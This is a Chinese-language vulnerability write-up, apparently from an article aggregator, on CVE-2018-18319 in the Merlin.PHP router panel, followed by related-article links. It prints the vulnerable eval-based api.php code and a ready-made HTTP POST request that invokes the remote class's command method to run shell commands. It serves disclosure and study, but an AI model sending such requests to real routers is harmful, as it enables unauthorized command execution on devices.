CVE-2018-18319 - 華碩路由器 Merlin.php 代碼執行漏洞
Merlin.phpphp
面向 ASUS﹣MERLIN 的 SS Web 管理面板。只支持 http://koolshare.io 下的固件版本。html
github連接:https://github.com/qoli/Merlin.PHPgit
在api.php中使用了eval函數,其餘幾個參數可控制致使任意代碼執行。
代碼以下:github
<?php
set_include_path(get_include_path() . PATH_SEPARATOR . 'library/phpseclib');
require_once 'library/MainFunction.php';
require_once 'Net/SSH2.php';
require_once 'library/Requests.php';
require_once 'library/AppFunction.php';
Requests::register_autoloader();
$merlin_php = new merlin_php();
if (!isset($_POST)) {
$merlin_php -> _export("no input");
exit;
}
$o = _GET("class",'unknow');
$f = _GET('function','unknow');
if ($o == 'unknow') {
$merlin_php -> _export("no input");
exit;
}
if ($f == 'unknow') {
$merlin_php -> _export("function?!");
exit;
}
if (!class_exists($o)) {
$merlin_php -> _export("class is none");
exit;
}
$c = new $o();
$agrs = implode(',',$_POST);
// echo '$c->'."$f($agrs);";
eval('$j = $c->'."$f($agrs);");
echo json_encode($j);
最後能控制的是 eval('$j = $c->'."$f($agrs);");json
$j=是一個變量賦值不用管,主要是後面的 $c->$f($agrs); 這裏面的三個參數均可控。
$c是基於$o建立的;
$o是獲取的參數class值 ;api
下面是關鍵代碼:app
$c = new $o();
$o = _GET("class",'unknow');
$f = _GET('function','unknow');
$agrs = implode(',',$_POST);
能夠看出$o是一個對象,$c是$o對象的實例化,$f是對象的成員方法,$agrs是post傳入的參數,也就是成員方法的參數。ssh
隨便找了一個類,AppFunction.php 中的 remote 類,看了下里面有個執行命令的方法 command;ide
public function command($command = 'whoami')
{
return $this->ssh->exec($command);
}
構造下面請求:函數
POST /6/api.php?function=command&class=remote HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded cc='ls'
跟蹤執行流程,實際是執行了下面的代碼,致使任意代碼執行漏洞。
$c = new remote;
$j = $c->command('ls');
github issue:https://github.com/qoli/Merlin.PHP/issues/27
相關文章
- 1. CVE-2018-18320 - 華碩路由器 Merlin.php 命令執行漏洞
- 2. 華碩路由器遠程代碼執行漏洞通告
- 3. PHP代碼執行漏洞
- 4. 命令執行、代碼執行漏洞
- 5. OpenWRT 曝遠程代碼執行漏洞
- 6. [遠程代碼執行] 遠程代碼執行漏洞
- 7. thinkphp任意代碼執行漏洞
- 8. ThinkPHP5.0.*版本代碼執行漏洞
- 9. 友訊(D-Link)、趨勢網絡路由器曝遠程代碼執行漏洞
- 10. s2-001遠程代碼執行漏洞
- 更多相關文章...
- • Markdown 代碼 - Markdown 教程
- • traceroute命令進行路由跟蹤 - TCP/IP教程
- • IntelliJ IDEA代碼格式化設置
- • IntelliJ IDEA安裝代碼格式化插件
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
歡迎關注本站公眾號,獲取更多信息
